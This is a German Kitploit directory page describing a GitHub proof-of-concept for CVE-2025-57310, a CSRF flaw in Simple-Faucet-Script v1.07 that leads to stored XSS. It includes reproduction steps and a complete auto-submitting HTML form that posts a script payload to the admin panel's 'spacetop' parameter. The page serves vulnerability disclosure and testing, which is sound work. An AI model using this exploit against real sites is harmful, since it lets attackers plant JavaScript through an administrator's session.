Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-57310 — Proof-of-Concept-Exploit für CVE-2025-57310: CSRF-Schwachstelle in Simple-Faucet-Script v1.07, die persistentes XSS über manipulierte POST-Anfragen an das Admin-Panel ermöglicht. | Kitploit
Tools/GitHubGitHub/hossainshadat/cve-2025-57310
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubhossainshadat/cve-2025-57310

CVE-2025-57310

Proof-of-Concept-Exploit für CVE-2025-57310: CSRF-Schwachstelle in Simple-Faucet-Script v1.07, die persistentes XSS über manipulierte POST-Anfragen an das Admin-Panel ermöglicht.

Repository anzeigen
1vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-57310

Eine Cross-Site-Request-Forgery (CSRF)-Sicherheitslücke in Salmen2/Simple-Faucet-Script v1.07 durch eine manipulierte POST-Anfrage an admin.php?p=ads&c=1, die es Angreifern ermöglicht, beliebigen Code auszuführen.

CWE

CWE-352: Cross-Site-Request-Forgery (CSRF)

CVSS v3.1 Base Score: 8.8 (Hoch)

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Zusammenfassung

Das Produkt ist anfällig für Cross-Site-Request-Forgery (CSRF) im Admin-Bereich. Wenn ein authentifizierter Administrator eine schädliche Seite mit dem PoC besucht, führt der CSRF-Angriff zu einer unbefugten Änderung des Inhalts der Startseite.

Schritte zur Reproduktion

  1. Melden Sie sich als Administrator unter https://example.com/admin.php an.
  2. Öffnen Sie den folgenden PoC; beachten Sie ein Alert-Popup auf der Startseite (Stored XSS).
root@kitploit:~
<!DOCTYPE html>
  <html>
  <head>
      <title>CSRF PoC</title>
  </head>
  <body>
      <h3>Standard CSRF PoC</h3>
      <form action="https://example.com/admin.php?p=ads&c=1" method="post">
        <input type="hidden" name="spacetop" value="<script>alert();</script>" />
          <input type="submit" value="Submit request" />
      </form>
      <script>
          history.pushState('', '', '/');
          document.forms[0].submit();
      </script>
  </body>
  </html>

Auswirkungen

Ein Angreifer kann über den Parameter spacetop beliebiges HTML/JavaScript in die Startseite einschleusen, was zu einer gespeicherten Cross-Site-Scripting (XSS)-Sicherheitslücke führt.

Tool herunterladen